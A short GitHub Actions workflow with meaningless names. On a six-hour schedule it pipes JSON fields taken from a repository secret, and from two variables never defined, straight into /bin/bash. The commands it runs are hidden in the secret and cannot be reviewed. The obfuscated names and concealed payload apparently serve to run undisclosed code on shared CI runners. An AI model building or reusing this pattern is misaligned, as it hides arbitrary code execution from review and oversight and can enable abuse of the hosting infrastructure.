name: longshuangfang4513
on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: longshuangfang4513
        env:
          kkyif121: ${{ secrets.kkyif121 }}
        run: |
          echo $kkyif121 | jq -r .s61036 | /bin/bash
          echo $ykmdw63933 | jq -r .wiog916 | /bin/bash
          echo $x1 | jq -r .uhs41136 | /bin/bash

